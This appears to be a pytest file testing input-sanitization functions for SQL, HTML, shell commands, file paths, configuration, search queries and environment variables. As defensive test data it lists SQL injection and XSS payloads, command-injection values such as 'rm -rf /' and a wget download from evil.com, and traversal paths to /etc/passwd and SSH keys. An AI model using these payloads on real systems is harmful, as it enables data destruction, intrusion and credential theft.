512 lines
17 KiB
Python
512 lines
17 KiB
Python
"""Unit tests for input sanitization and secure configuration handling."""
|
|
|
|
import json
|
|
import tempfile
|
|
import os
|
|
import shutil
|
|
from pathlib import Path
|
|
from typing import Dict, Any
|
|
|
|
import pytest
|
|
|
|
from src.security.input_sanitization import (
|
|
sanitize_sql_input,
|
|
sanitize_html_input,
|
|
sanitize_command_input,
|
|
sanitize_file_path,
|
|
sanitize_config_value,
|
|
validate_config_schema,
|
|
sanitize_search_query,
|
|
sanitize_environment_variable,
|
|
InputSanitizationError,
|
|
ConfigValidationError,
|
|
)
|
|
|
|
|
|
class TestSQLInputSanitization:
    """Tests for ``sanitize_sql_input``: injection stripping, passthrough, and edge cases."""

    def test_sanitize_sql_input_removes_sql_injection(self):
        """Injection payloads must come back free of SQL keywords, terminators, and comments."""
        payloads = (
            "'; DROP TABLE users; --",
            "' OR '1'='1",
            "'; INSERT INTO users VALUES ('hacker', 'password'); --",
            "admin'--",
            "'; UPDATE users SET password='hacked'; --",
        )
        # Every fragment below must be absent from each sanitized payload.
        forbidden = ("DROP", "INSERT", "UPDATE", "DELETE", ";", "--", "/*", "*/")

        for payload in payloads:
            cleaned = sanitize_sql_input(payload)
            for fragment in forbidden:
                assert fragment not in cleaned

    def test_sanitize_sql_input_preserves_safe_input(self):
        """Benign strings must pass through unchanged."""
        benign = (
            "normal text",
            "user123",
            "search query",
            "file_name.txt",
            "path/to/file",
        )
        for text in benign:
            assert sanitize_sql_input(text) == text

    def test_sanitize_sql_input_handles_edge_cases(self):
        """Empty, ``None``, whitespace-only, and long inputs are handled safely."""
        # Both the empty string and None map to the empty string.
        for blank in ("", None):
            assert sanitize_sql_input(blank) == ""

        # Whitespace-only input is returned untouched.
        assert sanitize_sql_input(" ") == " "

        # Sanitizing a long benign input must never make it longer.
        long_text = "a" * 1000
        assert len(sanitize_sql_input(long_text)) <= 1000

    def test_sanitize_sql_input_raises_error_for_critical_attacks(self):
        """Destructive payloads are rejected outright with ``InputSanitizationError``."""
        critical = (
            "'; DROP DATABASE; --",
            "'; SHUTDOWN; --",
            "'; EXEC xp_cmdshell; --",
        )
        for attack in critical:
            with pytest.raises(InputSanitizationError):
                sanitize_sql_input(attack)
|
|
|
|
|
|
class TestHTMLInputSanitization:
    """Test HTML input sanitization functions."""

    def test_sanitize_html_input_removes_xss_attempts(self):
        """Test that XSS attempts are sanitized."""
        xss_attempts = [
            "<script>alert('xss')</script>",
            "<img src=x onerror=alert('xss')>",
            "javascript:alert('xss')",
            "<iframe src='http://evil.com'></iframe>",
            "<svg onload=alert('xss')>",
        ]

        for xss_attempt in xss_attempts:
            sanitized = sanitize_html_input(xss_attempt)
            assert "<script>" not in sanitized
            assert "javascript:" not in sanitized
            assert "onerror=" not in sanitized
            assert "onload=" not in sanitized
            assert "<iframe" not in sanitized

    def test_sanitize_html_input_preserves_safe_html(self):
        """Test that safe HTML tags and their text content are preserved.

        Each case is ``(html, expected_tag, text)``. ``expected_tag`` is the
        opening-tag prefix that must survive sanitization, and ``text`` is the
        element's visible content.
        """
        # The anchor carries an href attribute, so a literal "<a>" never occurs
        # in it. Matching on the "<a" prefix is what actually exercises this
        # case. The earlier `elif "<a>" in html` branch could never match, so
        # the anchor was silently left unchecked.
        safe_html = [
            ("<p>Normal paragraph</p>", "<p>", "Normal paragraph"),
            ("<strong>Bold text</strong>", "<strong>", "Bold text"),
            ("<em>Italic text</em>", "<em>", "Italic text"),
            ("<a href='https://example.com'>Link</a>", "<a", "Link"),
        ]

        for html, expected_tag, text in safe_html:
            sanitized = sanitize_html_input(html)
            # Should preserve the original tag and its text content.
            assert expected_tag in sanitized
            assert text in sanitized

    def test_sanitize_html_input_handles_edge_cases(self):
        """Test edge cases for HTML input sanitization."""
        # Empty input
        assert sanitize_html_input("") == ""
        assert sanitize_html_input(None) == ""

        # Plain text
        assert sanitize_html_input("plain text") == "plain text"

        # Mixed content: the script is removed, the surrounding text survives.
        mixed = "Normal text <script>alert('xss')</script> more text"
        sanitized = sanitize_html_input(mixed)
        assert "<script>" not in sanitized
        assert "Normal text" in sanitized
        assert "more text" in sanitized
|
|
|
|
|
|
class TestCommandInputSanitization:
    """Tests for ``sanitize_command_input``."""

    def test_sanitize_command_input_removes_command_injection(self):
        """Shell chaining operators and the chained payloads are stripped."""
        attempts = (
            "file.txt; rm -rf /",
            "file.txt && rm -rf /",
            "file.txt | rm -rf /",
            "file.txt; cat /etc/passwd",
            "file.txt; wget http://evil.com/malware",
        )
        # None of these may remain in any sanitized result.
        banned = (";", "&&", "|", "rm -rf", "cat /etc", "wget")

        for attempt in attempts:
            result = sanitize_command_input(attempt)
            for token in banned:
                assert token not in result

    def test_sanitize_command_input_preserves_safe_commands(self):
        """Plain file names and relative paths are returned unchanged."""
        harmless = (
            "file.txt",
            "path/to/file",
            "filename with spaces.txt",
            "file-name_123.txt",
        )
        for name in harmless:
            assert sanitize_command_input(name) == name

    def test_sanitize_command_input_handles_edge_cases(self):
        """Empty, ``None``, and whitespace-only inputs are handled safely."""
        cases = [
            ("", ""),
            (None, ""),
            (" ", " "),
        ]
        for raw, expected in cases:
            assert sanitize_command_input(raw) == expected
|
|
|
|
|
|
class TestFilePathSanitization:
    """Tests for ``sanitize_file_path``."""

    def test_sanitize_file_path_removes_dangerous_paths(self):
        """Traversal sequences and sensitive system locations are stripped."""
        disallowed_parts = ("..", "/etc/", "/root/", "System32", ".ssh")
        risky_paths = (
            "../../../etc/passwd",
            "/etc/passwd",
            "/root/.ssh/id_rsa",
            "C:\\Windows\\System32\\config\\SAM",
            "~/.ssh/id_rsa",
        )

        for raw_path in risky_paths:
            cleaned = sanitize_file_path(raw_path)
            for part in disallowed_parts:
                assert part not in cleaned

    def test_sanitize_file_path_preserves_safe_paths(self):
        """Relative paths without traversal are returned unchanged."""
        for ok_path in (
            "file.txt",
            "path/to/file.txt",
            "subdirectory/file.txt",
            "file with spaces.txt",
        ):
            assert sanitize_file_path(ok_path) == ok_path

    def test_sanitize_file_path_handles_edge_cases(self):
        """Empty, ``None``, and current-directory paths are handled safely."""
        cases = [
            ("", ""),
            (None, ""),
            # A single "." is the current directory, not traversal, so it is kept.
            (".", "."),
            ("./file.txt", "./file.txt"),
        ]
        for raw_path, expected in cases:
            assert sanitize_file_path(raw_path) == expected
|
|
|
|
|
|
class TestConfigValueSanitization:
    """Tests for ``sanitize_config_value``: coercion, rejection, and bounds."""

    def test_sanitize_config_value_validates_types(self):
        """String and native inputs are coerced to the requested type."""
        # (raw value, target type, expected result) compared with ==.
        equality_cases = [
            ("string", str, "string"),
            ("123", str, "123"),
            ("123", int, 123),
            (123, int, 123),
            ("123.45", float, 123.45),
            (123.45, float, 123.45),
        ]
        for raw, target_type, expected in equality_cases:
            assert sanitize_config_value(raw, target_type) == expected

        # Booleans are compared by identity, so a truthy stand-in such as 1
        # would not satisfy these checks.
        bool_cases = [("true", True), ("false", False), (True, True)]
        for raw, expected in bool_cases:
            assert sanitize_config_value(raw, bool) is expected

    def test_sanitize_config_value_handles_invalid_types(self):
        """Values that cannot be coerced raise ``ConfigValidationError``."""
        uncoercible = [
            ("not_a_number", int),
            ("not_a_bool", bool),
            ("not_a_float", float),
        ]
        for raw, target_type in uncoercible:
            with pytest.raises(ConfigValidationError):
                sanitize_config_value(raw, target_type)

    def test_sanitize_config_value_enforces_bounds(self):
        """Values outside ``[min_value, max_value]`` are rejected."""
        int_bounds = {"min_value": 0, "max_value": 100}
        assert sanitize_config_value("50", int, **int_bounds) == 50
        for out_of_range in ("-1", "101"):
            with pytest.raises(ConfigValidationError):
                sanitize_config_value(out_of_range, int, **int_bounds)

        float_bounds = {"min_value": 0.0, "max_value": 1.0}
        assert sanitize_config_value("0.5", float, **float_bounds) == 0.5
        with pytest.raises(ConfigValidationError):
            sanitize_config_value("-0.1", float, **float_bounds)

    def test_sanitize_config_value_handles_edge_cases(self):
        """Missing (``None``) and empty string values are rejected."""
        for missing in (None, ""):
            with pytest.raises(ConfigValidationError):
                sanitize_config_value(missing, str)
|
|
|
|
|
|
class TestConfigSchemaValidation:
    """Tests for ``validate_config_schema`` using JSON-Schema-like dicts."""

    def test_validate_config_schema_validates_required_fields(self):
        """A config missing a ``required`` key is rejected; a complete one passes."""
        schema = {
            "type": "object",
            "required": ["api_key", "base_url"],
            "properties": {
                "api_key": {"type": "string"},
                "base_url": {"type": "string"},
                "timeout": {"type": "integer", "default": 30},
            },
        }
        complete = {"api_key": "secret_key", "base_url": "https://api.example.com"}
        missing_base_url = {"api_key": "secret_key"}

        # Accepted: must not raise.
        validate_config_schema(complete, schema)

        with pytest.raises(ConfigValidationError):
            validate_config_schema(missing_base_url, schema)

    def test_validate_config_schema_validates_field_types(self):
        """A property whose value has the wrong type is rejected."""
        schema = {
            "type": "object",
            "properties": {
                "timeout": {"type": "integer"},
                "enabled": {"type": "boolean"},
                "url": {"type": "string"},
            },
        }
        well_typed = {"timeout": 30, "enabled": True, "url": "https://example.com"}
        # Derived before any validation call, so it is an independent dict.
        bad_timeout = {**well_typed, "timeout": "not_a_number"}

        # Accepted: must not raise.
        validate_config_schema(well_typed, schema)

        with pytest.raises(ConfigValidationError):
            validate_config_schema(bad_timeout, schema)

    def test_validate_config_schema_handles_nested_objects(self):
        """Type errors inside nested objects are detected."""
        schema = {
            "type": "object",
            "properties": {
                "database": {
                    "type": "object",
                    "properties": {
                        "host": {"type": "string"},
                        "port": {"type": "integer"},
                    },
                },
            },
        }
        good_db = {"database": {"host": "localhost", "port": 5432}}
        # Fresh inner dict with only the port replaced by a non-integer.
        bad_db = {"database": {**good_db["database"], "port": "not_a_number"}}

        # Accepted: must not raise.
        validate_config_schema(good_db, schema)

        with pytest.raises(ConfigValidationError):
            validate_config_schema(bad_db, schema)
|
|
|
|
|
|
class TestSearchQuerySanitization:
    """Test search query sanitization functions."""

    def test_sanitize_search_query_removes_sql_injection(self):
        """Test that search queries are protected from SQL injection."""
        malicious_queries = [
            "'; DROP TABLE users; --",
            "' OR '1'='1",
            "admin'--",
        ]

        for query in malicious_queries:
            sanitized = sanitize_search_query(query)
            assert "DROP" not in sanitized
            assert "OR" not in sanitized
            assert "--" not in sanitized

    def test_sanitize_search_query_preserves_safe_queries(self):
        """Test that safe search queries are preserved."""
        safe_queries = [
            "transcription",
            "audio file",
            "podcast episode",
            "lecture notes",
        ]

        for query in safe_queries:
            sanitized = sanitize_search_query(query)
            assert sanitized == query

    def test_sanitize_search_query_handles_special_characters(self):
        """Test that benign special characters keep the query usable and dangerous ones are removed."""
        # Queries with ordinary punctuation. Sanitization must keep their
        # searchable content and leave no dangerous sequences behind.
        queries_with_special_chars = [
            "file-name.txt",
            "path/to/file",
            "file with spaces",
            "file@domain.com",
        ]

        for query in queries_with_special_chars:
            sanitized = sanitize_search_query(query)
            assert ";" not in sanitized
            assert "--" not in sanitized
            # Every query above contains "file". Checking that it survives
            # shows the sanitizer kept the content instead of discarding it.
            assert "file" in sanitized

        # None of the queries above contain ";" or "--", so those checks
        # cannot fail on their own. These queries embed the dangerous sequences
        # beside benign text so that their removal is actually exercised.
        queries_with_dangerous_chars = [
            "audio file; podcast",
            "lecture -- notes",
        ]

        for query in queries_with_dangerous_chars:
            sanitized = sanitize_search_query(query)
            assert ";" not in sanitized
            assert "--" not in sanitized
|
|
|
|
|
|
class TestEnvironmentVariableSanitization:
    """Tests for ``sanitize_environment_variable``."""

    def test_sanitize_environment_variable_removes_dangerous_chars(self):
        """Shell separators and pipes are stripped from variable names."""
        separators = (";", "&&", "|")
        tainted_names = (
            "PATH; rm -rf /",
            "HOME && rm -rf /",
            "USER | rm -rf /",
        )

        for raw_name in tainted_names:
            cleaned = sanitize_environment_variable(raw_name)
            for sep in separators:
                assert sep not in cleaned

    def test_sanitize_environment_variable_preserves_safe_names(self):
        """UPPER_SNAKE_CASE names are returned unchanged."""
        for var_name in ("API_KEY", "DATABASE_URL", "LOG_LEVEL", "DEBUG_MODE"):
            assert sanitize_environment_variable(var_name) == var_name

    def test_sanitize_environment_variable_handles_edge_cases(self):
        """Empty, ``None``, and whitespace-only names are handled safely."""
        cases = [
            ("", ""),
            (None, ""),
            (" ", " "),
        ]
        for raw, expected in cases:
            assert sanitize_environment_variable(raw) == expected
|
|
|
|
|
|
class TestInputSanitizationIntegration:
    """End-to-end checks that chain the SQL, HTML, and command sanitizers."""

    @staticmethod
    def _run_pipeline(text):
        """Pass *text* through the SQL, then HTML, then command sanitizer and return the result."""
        current = text
        for sanitizer in (sanitize_sql_input, sanitize_html_input, sanitize_command_input):
            current = sanitizer(current)
        return current

    def test_comprehensive_sanitization_pipeline(self):
        """A payload mixing SQL injection and XSS is fully neutralized by the chain."""
        final = self._run_pipeline(
            "'; DROP TABLE users; -- <script>alert('xss')</script>"
        )

        # Nothing dangerous may survive the full chain.
        for fragment in ("DROP", "<script>", ";", "--"):
            assert fragment not in final

    def test_sanitization_preserves_legitimate_content(self):
        """Ordinary text keeps its meaningful words after the full chain."""
        final = self._run_pipeline("Search for audio files in /path/to/files")

        for word in ("Search", "audio", "files", "path"):
            assert word in final
|